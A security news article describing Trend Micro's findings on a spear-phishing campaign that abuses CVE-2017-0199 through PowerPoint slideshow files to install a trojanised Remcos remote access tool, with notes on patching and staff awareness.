Microsoft PowerPoint exploit used to bypass antivirus and spread malware

It's the first time this exploit has been used to target PowerPoint users -- and it's being used to distribute powerful Trojan malware, say researchers.
Written by Danny Palmer, Senior Writer

Cyberattackers are exploiting a vulnerability that allows them to evade detection by antivirus software and deliver malware via Microsoft PowerPoint.

The flaw in the Windows Object Linking and Embedding (OLE) interface is being used by attackers to distribute malicious Microsoft Office files.

The exploit is commonly used to deliver infected Rich Text File (.RTF) documents, but cybersecurity researchers at Trend Micro have spotted attackers using it to compromise PowerPoint slideshow files for the first time.

As with many hacking campaigns, this attack begins with a spear-phishing email. The message purports to be from a cable manufacturing provider and mainly targets organisations in the electronics manufacturing industry.

The sender's address is disguised to look like a message from a business partner and the email appears to relate to an order request, with an attachment purportedly containing shipping information.


Phishing email used to distribute malware via Power Point.

Image: Trend Micro

However, the attachment is useless to the receiver, containing a malicious PowerPoint show that when opened simply displays the text 'CVE-2017-8570', a reference to a different Microsoft Office vulnerability than the one used in this attack.

The malicious file triggers an exploit for the CVE-2017-0199 vulnerability, which initialises the infection process. As a result, malicious code is run using the PowerPoint Show animations feature, which downloads a file logo document.

This downloaded logo.doc contains XML and JavaScript code, which runs PowerShell to execute a file called 'RATMAN.EXE', a Trojanised version of the Remcos remote access tool, which then connects to a command and control server.

Once up and running on a system, Remcos is capable of many criminal operations, with compromised machines at risk from keylogging, screenlogging, webcam and microphone recorders, and the downloading and execution of additional malware. Ultimately, it can give the attacker almost full control over the infected machine without the owner being aware.

Researchers note that the sample behind this attack uses NET protector, which includes several protections and obfuscations to make it more difficult for researchers to reverse engineer. That indicates skill on the part of the attackers, suggesting that this isn't an amateur campaign.

Critically, since most methods of detecting the CVE-2017-0199 vulnerability focus on the RTF attack method, the use of the PPSX PowerPoint as an attack vector means attackers can code the malware to avoid antivirus detection.

Fortunately, there's a way to completely avoid becoming a victim of this particular attack; Microsoft released patches to address the vulnerability in April and any systems updated with these is safe from this attack.

Nonetheless, users need to remain alert to the risks posed by legitimate looking phishing emails.

"Cases like this highlight the need for users to be cautious when opening files or clicking links in their emails--even if they come from seemingly legitimate sources. Spear phishing attempts can be rather sophisticated, and as seen with this example, can trick most users into downloading malicious files," wrote TrendMicro researchers Ronnie Giagone and Rubio Wu.

There are various techniques organisations can use to defend themselves against these attacks, with education of staff playing a key role.

Related coverage

Phishing: Would you fall for one of these scam emails?

There's still plenty more phish in the sea, as workers can't stop clicking on scam emails. Would these ones trick you?

Spying is the new hacking: Here's how to fight back

How can businesses defend themselves from hackers using traditional espionage techniques?


Editorial standards